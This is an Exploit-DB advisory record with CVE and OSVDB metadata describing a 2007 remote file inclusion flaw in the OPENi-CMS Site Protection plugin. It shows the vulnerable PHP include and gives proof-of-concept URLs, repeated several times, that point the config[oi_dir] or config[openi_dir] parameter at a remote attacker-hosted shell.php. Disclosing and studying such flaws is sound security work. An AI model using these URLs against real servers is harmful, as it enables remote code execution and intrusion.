OPENi-CMS Site Protection Plugin Remote File Inclusion Vulnerability
2007-02-11T00:00:00
ID EDB-ID:3292 Type exploitdb Reporter y3dips Modified 2007-02-11T00:00:00
Description
OPENi-CMS Site Protection Plugin Remote File Inclusion Vulnerability. CVE-2007-0881. Webapps exploit for php platform
------------------------------------------------------------------------------------
[ECHO_ADV_64$2007] Openi CMS plugins (site protection) remote file inclusion
------------------------------------------------------------------------------------
Author : Ahmad Muammar W.K (a.k.a) y3dips
Date Found : February, 11 2007
Location : Indonesia, Jakarta
web : http://echo.or.id/adv/adv64-y3dips-2007.txt
Critical Lvl : Critical
------------------------------------------------------------------------------------
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Application : Internal range (site protection), version: 1.0
Openi CMS plugins (http://www.openi-cms.org)
URL : http://www.openi-cms.org
Download-path : http://www.openi-cms.org/oi-download.php/45/file_src/oi_plugin_site_protection_1_0.zip
Description : With this Plugin you can release page ranges only for certain users. The user
must authentifizieren itself with user name and password. Several users for
a page range can be put on. Users and sides which can be protected are put on
in the editorship environment by the administrator.
---------------------------------------------------------------------------
Vulnerability:
~~~~~~~~~~~~~~
Variables "oi_dir" in index.php are not properly sanitized.
---------------index.php --------------------
...
<?PHP
global $config;
require_once($config["oi_dir"]."/base/sitemap_classes.php");
class plg_site_protection extends Plugin {
...
----------------------------------------------
An attacker can exploit this vulnerability with a simple php injection script.
Poc/Exploit:
~~~~~~~~~~~~
http://target-openi/open-admin/plugins/site_protection/index.php?config%5boi_dir%5d=http://attacker/shell.php ?
Notes:
~~~~~~
i have to change the variable "oi_dir" to "openi_dir" to get the cms works (config file),
but then u just change the exploit to
http://target-openi/open-admin/plugins/site_protection/index.php?config%5bopeni_dir%5d=http://attacker/shell.php?
it doesnt matter coz the variable still unsanitized.
---------------------------------------------------------------------------
Shoutz:
~~~~~~~
~ my lovely ana
~ k-159 (never stop advising [pushing] me :P), the_day (echo young evil thinker),
~ and all echo staff
~ str0ke, waraxe, negative
~ newbie_hacker@yahoogroups.com
~ #e-c-h-o @irc.dal.net
---------------------------------------------------------------------------
Contact:
~~~~~~~~
y3dips|| echo|staff || y3dips[at]gmail[dot]com
Homepage: http://y3dips.echo.or.id/
# milw0rm.com [2007-02-11]
{"hash": "10195c987e2cf7581241abe021204ce93a012e865958e42051379e37046f7411", "id": "EDB-ID:3292", "lastseen": "2016-01-31T18:08:47", "enchantments": {"vulnersScore": 4.3}, "bulletinFamily": "exploit", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "edition": 1, "history": [], "type": "exploitdb", "sourceHref": "https://www.exploit-db.com/download/3292/", "description": "OPENi-CMS Site Protection Plugin Remote File Inclusion Vulnerability. CVE-2007-0881. Webapps exploit for php platform", "title": "OPENi-CMS Site Protection Plugin Remote File Inclusion Vulnerability", "sourceData": "------------------------------------------------------------------------------------\n[ECHO_ADV_64$2007] Openi CMS plugins (site protection) remote file inclusion\n------------------------------------------------------------------------------------\n\nAuthor : Ahmad Muammar W.K (a.k.a) y3dips\nDate Found : February, 11 2007\nLocation : Indonesia, Jakarta\nweb : http://echo.or.id/adv/adv64-y3dips-2007.txt\nCritical Lvl : Critical\n------------------------------------------------------------------------------------\n\n\nAffected software description:\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\nApplication : Internal range (site protection), version: 1.0\nOpeni CMS plugins (http://www.openi-cms.org)\nURL : http://www.openi-cms.org\nDownload-path : http://www.openi-cms.org/oi-download.php/45/file_src/oi_plugin_site_protection_1_0.zip\n\nDescription : With this Plugin you can release page ranges only for certain users. The user\nmust authentifizieren itself with user name and password. Several users for\na page range can be put on. Users and sides which can be protected are put on\nin the editorship environment by the administrator.\n\n---------------------------------------------------------------------------\n\nVulnerability:\n~~~~~~~~~~~~~~\n\nVariables \"oi_dir\" in index.php are not properly sanitized.\n\n---------------index.php --------------------\n...\n<?PHP\nglobal $config;\nrequire_once($config[\"oi_dir\"].\"/base/sitemap_classes.php\");\n\nclass plg_site_protection extends Plugin {\n...\n----------------------------------------------\n\n\nAn attacker can exploit this vulnerability with a simple php injection script.\n\nPoc/Exploit:\n~~~~~~~~~~~~\n\nhttp://target-openi/open-admin/plugins/site_protection/index.php?config%5boi_dir%5d=http://attacker/shell.php ?\n\nNotes:\n~~~~~~\n\ni have to change the variable \"oi_dir\" to \"openi_dir\" to get the cms works (config file),\nbut then u just change the exploit to\n\nhttp://target-openi/open-admin/plugins/site_protection/index.php?config%5bopeni_dir%5d=http://attacker/shell.php?\n\nit doesnt matter coz the variable still unsanitized.\n\n---------------------------------------------------------------------------\nShoutz:\n~~~~~~~\n~ my lovely ana\n~ k-159 (never stop advising [pushing] me :P), the_day (echo young evil thinker),\n~ and all echo staff\n~ str0ke, waraxe, negative\n~ newbie_hacker@yahoogroups.com\n~ #e-c-h-o @irc.dal.net\n\n---------------------------------------------------------------------------\nContact:\n~~~~~~~~\n\ny3dips|| echo|staff || y3dips[at]gmail[dot]com\nHomepage: http://y3dips.echo.or.id/\n\n# milw0rm.com [2007-02-11]\n", "objectVersion": "1.0", "cvelist": ["CVE-2007-0881"], "published": "2007-02-11T00:00:00", "osvdbidlist": ["33175"], "references": [], "reporter": "y3dips", "modified": "2007-02-11T00:00:00", "href": "https://www.exploit-db.com/exploits/3292/"}
{"result": {"cve": [{"id": "CVE-2007-0881", "type": "cve", "title": "CVE-2007-0881", "description": "PHP remote file inclusion vulnerability in the Seitenschutz plugin for OPENi-CMS 1.0 allows remote attackers to execute arbitrary PHP code via a URL in the (1) config[oi_dir] and possibly (2) config[openi_dir] parameters to open-admin/plugins/site_protection/index.php. NOTE: vector 2 might be the same as CVE-2006-4750.", "published": "2007-02-12T15:28:00", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-0881", "cvelist": ["CVE-2007-0881"], "lastseen": "2017-10-19T11:12:45"}], "osvdb": [{"id": "OSVDB:33175", "type": "osvdb", "title": "OPENi-CMS Seitenschutz Plugin open-admin/plugins/site_protection/index.php config[oi_dir] Variable Remote File Inclusion", "description": "## Manual Testing Notes\nhttp://[target-openi]/open-admin/plugins/site_protection/index.php?config%5boi_dir%5d=http://[attacker]/shell.php?\n## References:\n[Secunia Advisory ID:24119](https://secuniaresearch.flexerasoftware.com/advisories/24119/)\nOther Advisory URL: http://echo.or.id/adv/adv64-y3dips-2007.txt\nISS X-Force ID: 32423\nGeneric Exploit URL: http://www.milw0rm.com/exploits/3292\nFrSIRT Advisory: ADV-2007-0556\n[CVE-2007-0881](https://vulners.com/cve/CVE-2007-0881)\nBugtraq ID: 22511\n", "published": "2007-02-11T07:48:43", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://vulners.com/osvdb/OSVDB:33175", "cvelist": ["CVE-2007-0881"], "lastseen": "2017-04-28T13:20:29"}]}}